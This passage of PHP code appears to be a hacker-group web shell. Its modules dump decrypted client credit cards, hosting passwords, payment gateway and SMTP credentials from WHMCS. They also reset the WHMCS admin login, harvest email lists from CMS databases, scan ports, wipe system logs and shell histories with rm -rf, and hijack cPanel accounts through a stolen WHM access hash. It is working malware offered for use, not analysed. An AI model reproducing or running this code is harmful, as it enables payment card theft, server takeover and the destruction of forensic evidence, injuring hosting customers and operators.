fwrite($II11II11II11II11,"SERVER : 
");
fwrite($II11II11II11II11,$bagong."
"); 
fwrite($II11II11II11II11,"
");
fclose($II11II11II11II11); 
}
echo "</table>"; 
$query = mysql_query("SELECT *FROM tblregistrars");
echo "<center><font color='orange' size='5'><b><u>Domain Registrars</u></b></font></center><br/> <table border='1' align='center' cellpadding='5'>
<tr> <td align='center'><b> <font color='orange'> REGISTRAR</font></b></td>
<td align='center'><b> <font color='orange'> SETTING</font></b></td>
<td align='center'><b> <font color='orange'> VALUE</font> </b></td></tr>";
while($v = mysql_fetch_array($query)){
$value = (!dec($v['value'],$cc_encryption_hash)) ? "0":dec($v['value'],$cc_encryption_hash);
echo "<tr>
<td align='center'> <font color='green'> {$v['registrar']}</font></td>
<td align='center'> <font color='green'> {$v['setting']}</font></td>
<td align='center'> <font color='green'> $value</font></td></tr>" ;
}
echo "</table>"; 
$query = mysql_query("SELECT *FROM tblpaymentgateways");
echo "<center><font color='orange' size='5'><b><u>Payment Gateway</u></b></font></center><br/> <table border='1' align='center' cellpadding='5'>
<tr> <td align='center'><b> <font color='orange'> GATEWAY</font></b></td>
<td align='center'><b> <font color='orange'> SETTING </font></b></td>
<td align='center'><b> <font color='orange'> VALUE </font></b></td>
<td align='center'><b> <font color='orange'> ORDER </font></b></td></tr>";
while($v = mysql_fetch_array($query)){
echo "<tr>
<td align='center'> <font color='green'> {$v['gateway']}</font></td>
<td align='center'> <font color='green'> {$v['setting']}</font></td>
<td align='center'> <font color='green'> {$v['value']}</font></td>
<td align='center'> <font color='green'> {$v['order']}</font></td> </tr>" ;
}
echo "</table>"; 
$query = mysql_query("SELECT id FROM tblclients WHERE issuenumber != '' ORDER BY id DESC"); 
echo "<hr><br/><center><font color='orange' size='5'><b><u>Cilent CC</b></u></font></center><br/> <table border='1' cellpadding='5' align='center'>
<tr><td align='center'><b> <font color='orange'>CardType</font></b></td>
<td align='center'><b><font color='orange'>CardNumb </font></b></td>
<td align='center'><b> <font color='orange'>Expdate</font></b></td>
<td align='center'><b> <font color='orange'>IssueNumber</font></b></td>
<td align='center'><b> <font color='orange'>FirstName</font></b></td>
<td align='center'><b> <font color='orange'>LastName</font></b></td>
<td align='center'><b><font color='orange'>Address</font></b></td>
<td align='center'><b> <font color='orange'>Country</font></b></td> 
<td align='center'><b> <font color='orange'>Phone</font></b></td>
<td align='center'><b> <font color='orange'>Email</font></b></td> 
</tr>";
while($v = mysql_fetch_array($query)) { 
$cchash = md5($cc_encryption_hash.$v['0']);
$s = mysql_query("SELECT firstname,lastname,address1,country,phonenumber,cardtype,email,AES_DECRYPT(cardnum,'" . $cchash . "') as cardnum,AES_DECRYPT(expdate,'" . $cchash . "') as expdate,AES_DECRYPT(issuenumber,'" . $cchash . "') as issuenumber FROM tblclients WHERE id='".$v['0']."'");
$v2=mysql_fetch_array($s); 
echo "<tr>
<td align='center'> <font color='green'> ".$v2['cardtype']."</font></td>
<td align='center'> <font color='green'> ".$v2['cardnum']." </font> </td>
<td align='center'> <font color='green'> ".$v2['expdate']." </font> </td>
<td align='center'> <font color='green'> ".$v2['issuenumber']." </font> </td>
<td align='center'> <font color='green'> ".$v2['firstname']." </font> </td>
<td align='center'> <font color='green'> ".$v2['lastname']." </font> </td>
<td align='center'> <font color='green'> ".$v2['address1']." </font> </td>
<td align='center'> <font color='green'> ".$v2['country']." </font> </td> 
<td align='center'> <font color='green'> ".$v2['phonenumber']." </font> </td>
<td align='center'>".$v2['email']." </font> </td></tr>";
}
echo "</table>";
$query = mysql_query("SELECT *FROM tblhosting");
echo "<center><font color='orange' size='5'><b><u>Clients Hosting Account</u></b></font></center><br/><table border='1' cellpadding='5' align='center'>
<tr><td align='center'><b> <font color='orange'> DOMAIN</font></b></td>
<td align='center'><b> <font color='orange'> USERNAME</font></b></td>
<td align='center'><b> <font color='orange'> PASSWORD</font></b></td>
<td align='center'><b> <font color='orange'> IP ADDRESS</font></b></td></tr>";
while($v = mysql_fetch_array($query)){
echo "<tr>
<td align='center'> <font color='green'> {$v['domain']}</font></td>
<td align='center'> <font color='green'> {$v['username']}</font></td>
<td align='center'> <font color='green'> ".dec($v['password'],$cc_encryption_hash)."</font></td>
<td align='center'> <font color='green'> {$v['assignedips']}</font></td></tr>";
}
echo "</table><br /><br />";
echo "<center><h1>paypal + smtp login</h1>";
$query0=mysql_query("SELECT * FROM tblemailtemplates where name='Client Signup Email' or name='Password Reset Confirmation'");
while($v0=mysql_fetch_array($query0))
{
$t=$v0['subject'];
$t=trim(str_replace('{$company_name}','',$t));
$c=$v0['message'];
$c=explode("
",$c);
$r="";
for ($i=0;$i<count($c);$i++) {
if(strpos($c[$i],'{$client_password}')>0) {
$r.= $c[$i];
}elseif(strpos($c[$i],'{$client_email}')>0) {
$r.= $c[$i];
}
}
$r=preg_quote($r);
$r=str_replace('\{\$client_email\}','(.*)',$r);
$r=str_replace('\{\$client_password\}','(.*)',$r);
$r=str_replace('\{\$whmcs_link\}','(.*)',$r);
$r=str_replace('\{\$signature\}','(.*)',$r);
$r=str_replace('\{\$client_name\}','(.*)',$r);
$r=str_replace("
","",$r);
$r=str_replace("
","",$r);
$query=mysql_query("SELECT message,userid FROM tblemails where subject like '%".$t."%'");
while($v=mysql_fetch_array($query))
{
$mail=$v['message'];
$mail=str_replace("
","",$mail);
$mail=str_replace("
","",$mail);
// echo $mail;
   $reg  = "|(.*)$r(.*)|isU";
   // echo $reg;
$a=array();
preg_match_all($reg,($mail),$a);
for ($i=1;$i<count($a);$i++){
if( eregi("^[_\.0-9a-z-]+@([0-9a-z-]+\.)+[a-z]{2,10}$",$a[$i][0]) ) {
$list[$v['userid']]['mail'][]=$a[$i][0];
$list[$v['userid']]['pass'][]=$a[$i+1][0];
}
}
}
 
}
echo("<h3  class=\"tit\">Total Records ".(count($list)-1)."</h3>");
echo "<table border='1'>";
foreach ($list as $x=>$y){
echo "<tr><td><a href='?p=12&id=</a></td><td>".implode("<br>",$y['mail'])."|".implode("<br>",$y['pass'])."</td></tr>";
}
echo "</table>";
echo "<center><h1>smtp</h1>";
   
$query = mysql_query("SELECT * FROM tblconfiguration where 1");

        echo "<table border='1' cellpadding='5'>";

            while($row = mysql_fetch_array($query)){

                  if($row[setting] == 'SMTPHost'){
                        echo  "<tr><td>Hostname</td><td>{$row[value]}</td></tr>";
                  }elseif($row[setting] == 'SMTPUsername'){
                        echo  "<tr><td>Username</td><td>{$row[value]}</td></tr>";
                  }elseif($row[setting] == 'SMTPPassword'){
                        echo  "<tr><td>Password</td><td>{$row[value]}</td></tr>";
                  }elseif($row[setting] == 'SMTPPort'){
                        echo  "<tr><td>Port</td><td>{$row[value]}</td></tr>";
                  }
            }

        echo "</table>";


}
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'olenk6')) {
?>
<form action="?&amp;idb=olenk6" method="post">
<?php
echo '<form method="post">
<b><table class=tabnet>';
echo '<tr><th colspan="2"><b>-=[[ WHMCS RESSET PASS ]]=-</b></th></center></tr>';
echo '<tr><td>db_host </td><td><input class=olenk type="text" size="40" name="anu1" value="localhost"></td></tr>
<tr><td>db_username </td><td><input type="text" class=olenk size="40" name="anu2"></td></tr>
<tr><td>db_password</td><td><input type="text" class=olenk size="40" name="anu3"></td></tr>
<tr><td>db_name</td><td><input type="text" class=olenk size="40" name="anu4"></td></tr>
<tr><td>id_admin</td><td><input type="text" class=olenk size="40" value="1" name="idmaho"></td></tr>
<tr><td>new_username</td><td><input type="text" class=olenk size="40" value="pbm" name="userbaru"></td></tr>
<tr><td>new_password</td><td><input type="text" class=olenk size="40" value="idbteam" name="passbaru"></td></tr></table>
 <input type="submit" class=olenk1  value=" HAJAR BOS " name="plapon">
<br>
</form>';
    if (isset($_POST['plapon'])) {
        $anu1 = $_POST['anu1'];
        $anu2 = $_POST['anu2'];
        $anu3 = $_POST['anu3'];
        $anu4 = $_POST['anu4'];
        @mysql_connect($anu1, $anu2, $anu3);
        @mysql_select_db($anu4);
        $idmaho = str_replace("\'", "'", $idmaho);
        $target_id = $_POST['idmaho'];
        $userbaru = str_replace("\'", "'", $userbaru);
        $ganti_user = $_POST['userbaru'];
        $passbaru = str_replace("\'", "'", $passbaru);
        $hash_pass = $_POST['passbaru'];
        $ganti_pass = md5($hash_pass);
        $colox = "UPDATE tbladmins SET username ='" . $ganti_user . "' WHERE id ='" . $target_id . "'";
        $coloxx = "UPDATE tbladmins SET password ='" . $ganti_pass . "' WHERE id ='" . $target_id . "'";
        $udah_ganteng = @mysql_query($colox);
        $udah_ganteng = @mysql_query($coloxx);
        if ($udah_ganteng) {
            echo "<font color='lime'>SUKSES BOS  GANTENG :P</font>";
        }
    }
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'olenk7')) {
?>
<form action="?&amp;idb=olenk7" method="post">
<?php
echo '<form action="" method="post"><b><table class=tabnet>';
echo '<tr><th colspan="2"><b>-=[[ EXTRACT EMAILL COEG ]]=-</b></th></center></tr>';
echo '<tr><td>host</td><td><input class=olenk type=text size=40 name="host" value="localhost"></td></tr>';
echo '<tr><td>db name</td><td><input class=olenk type=text size=40 name="data"></td></tr>';
echo '<tr><td>db user</td><td><input class=olenk type=text size=40 name="user"></td></tr>';
echo '<tr><td>db pass</td><td><input class=olenk type=text size=40 name="pass"></td></tr>';
echo '<tr><td>db prefix</td><td><input class=olenk type=text size=40 name="dbprefix"></td></tr></table>';
echo'<center><input class=olenk1  type="submit"
name="joomla" value="joomla">
<input class=olenk1  type="submit"
name="opencart" value="opencart">
<input class=olenk1 type="submit"
name="wordpress" value="wordpress">
<input class=olenk1 type="submit"
name="whmcs" value="whmcs"></form></center>';

$host = $_POST['host'];
 $data = $_POST['data'];
 $user = $_POST['user'];
 $pass = $_POST['pass'];
 $dbprefix = $_POST['dbprefix'];
 
 # Command MySQL
 $cart = "SELECT `email` FROM `oc_user`";
 $wp = "SELECT `user_email` FROM `wp_users`";
 $j0 = 'SELECT `email` FROM `'.$dbprefix.'users` GROUP BY `email` ORDER BY `email`'; 
 $whm = "SELECT `email` FROM `tblclients`";
 
 # function connect MySQL & Select DB
 function connect($host,$data,$user,$pass) {
    $co = @mysql_connect($host,$user,$pass) or die(mysql_error());
   $da = @mysql_select_db($data) or die(mysql_error());
      return $co;
 }

 # OpenCart
if(isset($_POST['opencart'])){
$host = $_POST['host'];
 $data = $_POST['data'];
 $user = $_POST['user'];
 $pass = $_POST['pass'];
   echo "<center><textarea class=olenk cols='35' rows='18'>";
   if(connect($host, $data, $user, $pass)) {
   $cmd1 = @mysql_query($cart);
   while($emails1 = @mysql_fetch_array($cmd1)) {
   echo "{$emails1[email]}
"; }
   echo "</textarea></center>";  } }
 
 # Wordpress
if(isset($_POST['wordpress'])){
$host = $_POST['host'];
 $data = $_POST['data'];
 $user = $_POST['user'];
 $pass = $_POST['pass'];
   echo "<center><textarea class=olenk cols='35' rows='18'>";
   if(connect($host, $data, $user, $pass)) {
   $cmd2 = @mysql_query($wp);
   while($emails2 = @mysql_fetch_array($cmd2)) {
      echo "{$emails2[user_email]}
"; }
   echo "</textarea></center>"; } }
 
 # Joomla
if(isset($_POST['joomla'])){
$host = $_POST['host'];
 $data = $_POST['data'];
 $user = $_POST['user'];
 $pass = $_POST['pass'];
 $dbprefix = $_POST['dbprefix'];
   echo "<center><textarea class=olenk cols='35' rows='18'>";
   if(connect($host, $data, $user, $pass)) {
    $cmd3 = @mysql_query($j0);
   while($emails3 = @mysql_fetch_array($cmd3)) {
      echo "{$emails3[email]}
"; }
   echo "</textarea></center>"; } }
 
 # WHMCS
if(isset($_POST['whmcs'])){
$host = $_POST['host'];
 $data = $_POST['data'];
 $user = $_POST['user'];
 $pass = $_POST['pass'];
   echo "<center><textarea class=olenk cols='35' rows='18'>";
      if(connect($host, $data, $user, $pass)) {
    $cmd4 = @mysql_query($whm);
   while($emails4 = @mysql_fetch_array($cmd4)) {
      echo "{$emails4[email]}
"; }
   echo "</textarea></center>"; }
 }
   echo "<br>";
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'olenk8')) {
?>
<form action="?&amp;idb=olenk8" method="post">
<?php
echo '<form action="" method="post"><b><table class=tabnet>';
echo '<tr><th colspan="2"><b>-=[[ PORT SCANER ]]=-</th></center></tr>';
echo '<tr><td><b>site / ip :</b></td>';
echo '<td><input class=olenk type="text" name="site" size="40" />';
echo '<input class=olenk1 type="submit" name="sites" value="scan" />';
echo '</td></tr> </table>';

if(isset($_POST['sites'])){
   error_reporting(0);
   $site = $_POST['site'];
   $port = array(20,21,22,25,65,80,81,110,111,119,143,389,443,445,981,1503,1720,2082,2525,3128,3306,3360,3389,4899,5631,5900,8080,8888); $batas=count($port);
   echo "<table>";
   $i=0;
      while($i<$batas){
      $fp = fsockopen($site,$port[$i],$errno,$errstr,10);
         if(!$fp){
            echo "<tr><td>&bull; ".$port[$i]." </td><td>==> <font color=red><b>Cannot</b></font> connect to server</td></tr>";}
               else
                  {
                  echo "<tr><td>&bull; ".$port[$i]." </td><td>==> Connect was <b><font color=green>successful</font></b> - open at ".$site;fclose($fp)."</td></tr>";}
               $i++;

                  }
               }   
   echo "</table>";
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'olenk9')) {
?>
<form action="?&amp;idb=olenk9" method="post">
<?php
@error_reporting(0);
set_time_limit(0);
system("clear");

echo "<br><br>";
print "[+] clear log mode by OL3NK_T34 [+] 
";
echo "<br><br>";
print "-=[[ PBM BN-IDBTE4M ]]=-
";
echo "<br>";
print "~~~~~~~~~~~~~~~~~~~~~~~~~
";
echo "<br>";
print " permisi kang tukang ngpell mau lewat ^_^ 
";
echo "<br>";
print "~~~~~~~~~~~~~~~~~~~~~~~~~ 
";
echo "<br><br>";
sleep(1);  
print "
 bersih bersih di mulai~~~~~~\!/";
sleep(2);



{

exec("rm -rf /tmp/logs");
exec("rm -rf /root/.ksh_history");
exec("rm -rf /root/.bash_history");
exec("rm -rf /root/.bash_logout");
exec("rm -rf /usr/local/apache/logs");
exec("rm -rf /usr/local/apache/log");
exec("rm -rf /var/apache/logs");
exec("rm -rf /var/apache/log");
exec("rm -rf /var/run/utmp");
exec("rm -rf /var/logs");
exec("rm -rf /var/log");
exec("rm -rf /var/adm");
exec("rm -rf /etc/wtmp");
exec("rm -rf /etc/utmp");
exec("rm -rf $HISTFILE");
exec("rm -rf /var/log/lastlog");
exec("rm -rf /var/log/wtmp");

shell_exec("rm -rf /tmp/logs");
shell_exec("rm -rf /root/.ksh_history");
shell_exec("rm -rf /root/.bash_history");
shell_exec("rm -rf /root/.bash_logout");
shell_exec("rm -rf /usr/local/apache/logs");
shell_exec("rm -rf /usr/local/apache/log");
shell_exec("rm -rf /var/apache/logs");
shell_exec("rm -rf /var/apache/log");
shell_exec("rm -rf /var/run/utmp");
shell_exec("rm -rf /var/logs");
shell_exec("rm -rf /var/log");
shell_exec("rm -rf /var/adm");
shell_exec("rm -rf /etc/wtmp");
shell_exec("rm -rf /etc/utmp");
shell_exec("rm -rf $HISTFILE");
shell_exec("rm -rf /var/log/lastlog");
shell_exec("rm -rf /var/log/wtmp");

passthru("rm -rf /tmp/logs");
passthru("rm -rf /root/.ksh_history");
passthru("rm -rf /root/.bash_history");
passthru("rm -rf /root/.bash_logout");
passthru("rm -rf /usr/local/apache/logs");
passthru("rm -rf /usr/local/apache/log");
passthru("rm -rf /var/apache/logs");
passthru("rm -rf /var/apache/log");
passthru("rm -rf /var/run/utmp");
passthru("rm -rf /var/logs");
passthru("rm -rf /var/log");
passthru("rm -rf /var/adm");
passthru("rm -rf /etc/wtmp");
passthru("rm -rf /etc/utmp");
passthru("rm -rf $HISTFILE");
passthru("rm -rf /var/log/lastlog");
passthru("rm -rf /var/log/wtmp");

echo "<br><br>";
system("rm -rf /tmp/logs");
sleep(2);
print "=>bekas coli udah bersih [+].../tmp/logs 
";
sleep(2);
echo "<br>";
system("rm -rf /root/.bash_history");
sleep(2);
print "=>bekas coli udah bersih [+].../root/.bash_history 
";
echo "<br>";
system("rm -rf /root/.ksh_history");
sleep(2);
print "=>bekas coli udah bersih [+].../root/.ksh_history 
";
echo "<br>";
system("rm -rf /root/.bash_logout");
sleep(2);
print "=>bekas coli udah bersih [+].../root/.bash_logout 
";
echo "<br>";
system("rm -rf /usr/local/apache/logs");
sleep(2);
print"=>bekas coli udah bersih [+].../usr/local/apache/logs 
";
echo "<br>";
system("rm -rf /usr/local/apache/log");
sleep(2);
print"=>bekas coli udah bersih [+].../usr/local/apache/log 
";
echo "<br>";
system("rm -rf /var/apache/logs");
sleep(2);
print"=>bekas coli udah bersih [+].../var/apache/logs 
";
echo "<br>";
system("rm -rf /var/apache/log");
sleep(2);
print"=>bekas coli udah bersih [+].../var/apache/log 
";
echo "<br>";
system("rm -rf /var/run/utmp");
sleep(2);
print"=>bekas coli udah bersih [+].../var/run/utmp 
";
echo "<br>";
system("rm -rf /var/logs");
sleep(2);
print"=>bekas coli udah bersih [+].../var/logs 
";
echo "<br>";
system("rm -rf /var/log");
sleep(2);
print"=>bekas coli udah bersih [+].../var/log 
";
echo "<br>";
system("rm -rf /var/adm");
sleep(2);
print"=>bekas coli udah bersih [+].../var/adm 
";
echo "<br>";
system("rm -rf /etc/wtmp");
sleep(2);
print"=>bekas coli udah bersih [+].../etc/wtmp 
";
echo "<br>";
system("rm -rf /etc/utmp");
sleep(2);
print"=>bekas coli udah bersih [+].../etc/utmp 
";
echo "<br>";
system("rm -rf $HISTFILE");
sleep(2);
print"=>bekas coli udah bersih [+]...$HISTFILE 
"; 
echo "<br>";
system("rm -rf /var/log/lastlog");
sleep(2);
print"=>bekas coli udah bersih [+].../var/log/lastlog 
";
echo "<br>";
system("rm -rf /var/log/wtmp");
sleep(2);
print"=>bekas coli udah bersih [+].../var/log/wtmp 
";
echo "<br><br>";
sleep(4);

print "[+] [+] semua bekas coli udah bersih~~~~[+] [+] 
";
echo "<br>";
print "=>jangan lupa bayar ya :v 
";
echo "<br>";
print "~~~~~~~~~~~~~~~~~~~~~~~~~
";
echo "<br><br>";
}
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'olenk10')) {
?>
<form action="?&amp;idb=olenk10" method="post">
<?php
$submit= $_POST['enter'];
if (isset($submit)) {
$pass = $_POST['password']; // password
$salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
$hash = md5($pass); // md5 hash #1
$md4 = hash("md4",$pass);
$hash_md5 = md5($salt.$pass); // md5 hash with salt #2
$hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
$hash1 = sha1($pass); // sha1 hash #4
$sha256 = hash("sha256",$text);
$hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
$hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
}
echo '<form action="" method="post"><b><table class=tabnet>';
echo '<tr><th colspan="2">Password Hash</th></center></tr>';
echo '<tr><td><b>masukan kata yang ingin di encrypt:</b></td>';
echo '<td><input class=olenk type="text" name="password" size="50" />';
echo '<input class=olenk1 type="submit" name="enter" value="hash" />';
echo '</td></tr>';
echo '<tr><th colspan="2">Hasil Hash</th></center></tr>';
echo '<tr><td>Original Password</td><td><input class=olenk type=text size=50 value='.$pass.'></td></tr>';
echo '<tr><td>MD5</td><td><input class=olenk type=text size=50 value='.$hash.'></td></tr>';
echo '<tr><td>MD4</td><td><input class=olenk type=text size=50 value='.$md4.'></td></tr>';
echo '<tr><td>MD5 with Salt</td><td><input class=olenk type=text size=50 value='.$hash_md5.'></td></tr>';
echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=olenk type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>';
echo '<tr><td>Sha1</td><td><input class=olenk type=text size=50 value='.$hash1.'></td></tr>';
echo '<tr><td>Sha256</td><td><input class=olenk type=text size=50 value='.$sha256.'></td></tr>';
echo '<tr><td>Sha1 with Salt</td><td><input class=olenk type=text size=50 value='.$hash1_sha1.'></td></tr>';
echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=olenk type=text size=50 value='.$hash1_sha1_double.'></td></tr></table>'; 
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'olenk11')) {
?>
<form action="?&amp;idb=olenk11" method="post">
<?php
         echo '<form action="" method="post"><b><table class=tabnet>';
echo '<tr><th colspan="2"><b>-=[[ KUNCI FOLDER ]]=-</b></th></center></tr>';
echo "<tr><td>Dir</td><td><input class=olenk name='path' type='text' value=/home/".@get_current_user()."/  size=40></td></tr>";
echo '<tr><td>username</td><td><input class=olenk type=text size=40 name="username"></td></tr>';
echo '<tr><td>password</td><td><input class=olenk type=text size=40 name="password"></td></tr>';
echo '<tr><td><input class=olenk1 type=submit name="submit" value="kunci"></td></tr>
</table>';

        # POSTS
        $username = $_POST['username'];
        $password = $_POST['password'];
        $path = $_POST['path'];
        # htaccess
        $htaccess = "IyBHZW5lcmF0ZWQgQnkgeFNlY3VyaXR5IAojIERlVi1Qb2luVC5Db00KCkF1dGhUeXBlIEJhc2ljCkF1dGhOYW1lICJQcm90ZWN0ZWRbeFNlY3VyaXR5XSIKQXV0aFVzZXJGaWxlICN4c2VjdXJpdHkjLy5odHBhc3N3ZApSZXF1aXJlIHZhbGlkLXVzZXI=";
       
        $b0x = str_replace("#xsecurity#" ,$path ,base64_decode($htaccess));
        $crypt = crypt($password, base64_encode($password));
       
        # Create
        if($_POST['submit'])
        {
                $htpasswd = fopen($path.'.htpasswd', 'w');
                if($htpasswd)
                {
                        $s = $username.":".$crypt;
                        $x = fwrite($htpasswd,$s);
                        if($x)
                        {
                                print "<center><font face='Tahoma' size='2'>[+] <b>.htpasswd</b> Created </center></font>";
                        }
                }
                $htx = fopen('.htaccess','w');
                if($htx)
                {
                        $xx = fwrite($htx, $b0x);
                        if($xx)
                        {
                                print "<center><font face='Tahoma' size='2'>[+] <b>.htaccess</b> Created</font>";
                        }
                }
        }
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'olenk12')) {
?>
<form action="?&amp;idb=olenk12" method="post">
<?php
error_reporting(0);
$whm_ssl = 1;
$whm_metode = '/usr/local/cpanel/Cpanel/Accounting.php.inc';
//functiont
class Whm{
var $controller = true;
var $host = null;
var $user=null;
var $accessHash = null;
var $errors=array();
var $fp=null;
function startup(&$controller){
$this->controller =& $controller;}
function init($host,$user,$accessHash){
$this->host=$host;
$this->user=$user;
$accessHash = str_replace(array("
", "
"),"",$accessHash);
$this->accessHash=$accessHash;}
function connect($api_path){
$this->fp = fsockopen("ssl://" . $this->host, 2087, $errno, $errstr, 30);
//$this->fp = fsockopen("ssl://" . $this->host, 2087, $errno, $errstr, 30);
if ($errno == 0 && $this->fp == false){
$this->errors[]="Socket Error: Could not initialize socket.";
return false;}
elseif ($this->fp == false){
$this->errors[]="Socket Error #" . $errno . ": " . $errstr;
return false;}
$header = "";
$header .= "GET " . $api_path . " HTTP/1.0
";
$header .= "Host: " . $this->host . "
";
$header .= "Connection: Close
";
$header .= "Authorization: WHM " . $this->user . ":" . $this->accessHash . "
";
//$header .= "Authorization: Basic " . base64_encode($user . ":" . $pass) . "
";
$header .= "
";
if(!@fputs($this->fp, $header)){
$this->errors[]='Unable to send header.';
return false;}}
function disconnect(){
fclose($this->fp);}
function getOutput(){
$rawResult = "";
while (!feof($this->fp)){
$rawResult .= @fgets($this->fp, 128);}
$rawResultParts = explode("

",$rawResult);
$result = $rawResultParts[1];
return $result;}
function version(){
$this->connect('/xml-api/version');
$xmlstr=$this->getOutput();
if($xmlstr==''){
$this->errors[]='No output.';
return false;}
$this->disconnect();
$xml = new SimpleXMLElement($xmlstr);
return $xml->version;
}
function gethostname(){
$this->connect('/xml-api/gethostname');
$xmlstr=$this->getOutput();
if($xmlstr==''){
$this->errors[]='No output.';
return false;}
$this->disconnect();
$xml = new SimpleXMLElement($xmlstr);
return $xml->hostname;
}
function passwd($accUser,$pass){
$this->connect("/xml-api/passwd?user=$accUser&pass=$pass");
$xmlstr=$this->getOutput();
if($xmlstr==''){
$this->errors[]='No output.';
return false;}
$this->disconnect();
$xml = new DOMDocument();
$xml->loadXML($xmlstr);
$list = $xml->getElementsByTagName('statusmsg');
$i=0;
foreach ($list AS $element){
foreach ($element->childNodes AS $item){
$result[$i]['statusmsg']=$item->nodeValue;
$i++;}}
$list = $xml->getElementsByTagName('rawout');
$i=0;
foreach ($list AS $element){
foreach ($element->childNodes AS $item){
$result[$i]['rawout']=$item->nodeValue;
$i++;}}
if($result){
foreach ($result as $item => $output){
echo '</p>';
echo '<center><font class=olenk4>Password Berhasil Diganti</center><p><center>';
echo $output[rawout];
echo '</center>';
}
}else{
echo '<p><center><font class=olenk5>Tidak dapat tersambung ke server.. Mungkin hash access tidak valid..!!</font></p></div>';
}
echo '</center>';
}
function suspend($acctUser) {
$this->connect("/xml-api/suspendacct?user=$acctUser");
$xmlstr=$this->getOutput();
if($xmlstr==''){
$this->errors[]='No output.';
return false;}
$this->disconnect();
$xml = new DOMDocument();
$xml->loadXML($xmlstr);
$list = $xml->getElementsByTagName('statusmsg');
$i=0;
foreach ($list AS $element){
foreach ($element->childNodes AS $item){
$result[$i]['statusmsg']=$item->nodeValue;
$i++;}}
if($result){
echo '<table class=olenk border="1">
<tr><td><b>Suspended Account</b></tr></td>';
foreach ($result as $item => $output){
echo '<tr><td class=olenk4>';
echo $output[statusmsg];
echo '</td></tr>';
}
}
else{
echo '<p><center><font class=olenk5>Tidak dapat tersambung ke server.. Mungkin hash access tidak valid..!!</font></p>';
}
echo '</table>';
}
function createAccount($acctDomain,$acctUser,$acctPass,$acctPackg,$acctEmail){
$this->connect("/xml-api/createacct?username=$acctUser&password=$acctPass&plan=$acctPackg&domain=$acctDomain&contactemail=$acctEmail&ip=y&cgi=y&frontpage=y&cpmod=x3&useregns=1&reseller=0");
$xmlstr=$this->getOutput();
if($xmlstr==''){
$this->errors[]='No output.';
return false;}
$this->disconnect();
$xml = new DOMDocument();
$xml->loadXML($xmlstr);
$list = $xml->getElementsByTagName('statusmsg');
$i=0;
foreach ($list AS $element){
foreach ($element->childNodes AS $item){
$result[$i]['statusmsg']=$item->nodeValue;
$i++;}}
$list = $xml->getElementsByTagName('rawout');
$i=0;
foreach ($list AS $element){
foreach ($element->childNodes AS $item){
$result[$i]['rawout']=$item->nodeValue;
$i++;}}
if($result){
foreach ($result as $item => $output){
echo '<b><p>Status :</b>';
echo $output[statusmsg];
echo '</p>';
echo '<center><font class=olenk4>Login Cpanel Kang</center><br><center><textarea class=olenk>';
echo strip_tags($output[rawout]);
echo '</textarea></center>';
}
}else{
echo '<font class=olenk5><center><p>Tidak dapat tersambung ke server.. Mungkin hash access tidak valid..!!</font></center></p>';
}
}
}
echo '<form action="" method="post"><b><table class=tabnet>';
echo '<tr><th colspan="2"><b>-=[[ RWHM TOOL ]]=-</b></th></center></tr>';
echo '<tr><td>hash</td><td><textarea class=olenk2 cols=40 rows=10 name="hash"></textarea></td></tr>';
echo '<tr><td>hostname</td><td><input class=olenk2 type=text size=40 name="host" value=""></td></tr>';
echo '<tr><td>admin</td><td><input class=olenk2 type=text size=40 name="admin" value=""></td></tr>';
echo '<tr><th colspan="2"><b>-=[[ FUNCTION CHECK ]]=-</b></th></center></tr></table>';
echo '<center>
<input class=olenk3 type="submit"
name="cek-pkgs" value="Cek Package"> <input class=olenk3 type="submit"
name="server" value="Cek Host"> <input class=olenk3 type="submit"
name="cek-acct" value="Cek Akun"> <input class=olenk3 type="submit"  name="tes" value="Cek Hash!"/></center>';
echo '<b><table class=tabnet><tr><td>user cp</td><td><input class=olenk2 type=text size=40 name="User-name" value=""></td></tr>';
echo '<tr><td>new pass</td><td><input class=olenk2 type=text size=40 name="password" value=""></td></tr>';
echo '<tr><td>domain</td><td><input class=olenk2 type=text size=40 name="domain" value=""></td></tr>';
echo '<tr><td>package</td><td><input class=olenk2 type=text size=40 name="plan" value=""></td></tr>';
echo '<tr><th colspan="2"><b>-=[[ EXECUTION ]]=-</b></th></center></tr></table>';
echo '<center><input class=olenk3 type="submit"
name="resetpass" value="Password"> <input class=olenk3 type="submit"
name="create" value="buat akun"> <input class=olenk3 type="submit"
name="suspended" value="Suspended"><br><input class=olenk3 type="submit"
name="unsuspend" value="Unsuspend"> <input class=olenk3 type="submit"
name="terminate" value="Terminate"></center>
</form>';

//terminate
set_time_limit(0);
if(isset($_POST['terminate'])){
$whm_host = $_POST['host'];
$whm_user = $_POST['admin'];
$whm_key  = $_POST['hash'];
$User = $_POST['User-name'];
if (!file_exists($whm_metode)) {
die($whm_metode . " does not exist. Please update program
with correct path to your WHM interface file.");}
if (!empty($whm_key)) {
require_once $whm_metode;
$tes = killacct ($whm_host, $whm_user, $whm_key, $whm_ssl, $User);
if($tes){
echo '<pre>';
print_r($tes);
echo '</pre>';
}}
}

//cek akun
set_time_limit(0);
if(isset($_POST['cek-acct'])){
$whm_host = $_POST['host'];
$whm_user = $_POST['admin'];
$whm_key  = $_POST['hash'];
if (!file_exists($whm_metode)) {
die($whm_metode . " does not exist. Please update program
with correct path to your WHM interface file.");}
if (!empty($whm_key)) {
require_once $whm_metode;
$tes = listaccts ($whm_host, $whm_user, $whm_key, $whm_ssl);
if($tes){
echo '<pre>';
print_r($tes);
echo '</pre>';
}
}
}

//ganti password
set_time_limit(0);
if(isset($_POST['resetpass'])){
echo '<div class="result">';
echo '<div class="a">';
$anu1 = $_POST['host'];
$anu2 = $_POST['admin'];
$anu3 = $_POST['hash'];
$User = $_POST['User-name'];
$newpass = $_POST['password'];
if (!empty($anu2)) {
$test= new whm;
